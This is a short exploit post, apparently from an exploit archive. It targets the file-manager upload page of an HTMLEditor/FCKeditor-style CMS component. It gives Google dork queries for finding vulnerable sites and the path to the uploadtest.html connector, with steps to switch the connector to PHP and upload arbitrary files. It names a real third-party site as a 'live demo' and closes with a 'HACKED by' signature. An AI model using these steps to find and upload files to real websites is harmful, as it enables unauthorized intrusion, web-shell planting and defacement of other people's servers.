Google Dork:
inurl:/HTMLEditor/editor/
or
"inurl:/HTMLEditor/editor//filemanager/"
or
"inurl:/HTMLEditor/editor//filemanager//connectors/"
Exploit:
http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or
http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Go here, http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html Change connectors into .php (Like FCKeditor) and upload your file
supported files: .txt and .jpg in some site you can upload .html and .php too
To view you file go-to: http://website/PowerCMS%20folder/files/your file here
or http://website/patch//PowerCMS%20folder/files/your file here
Live Demo:
- http://www.madhouse1.com/clients/dna/cms/HTMLEditor/editor/filemanager/connectors/uploadtest.html
- HACKED by -[D4RK_CRYST4L]-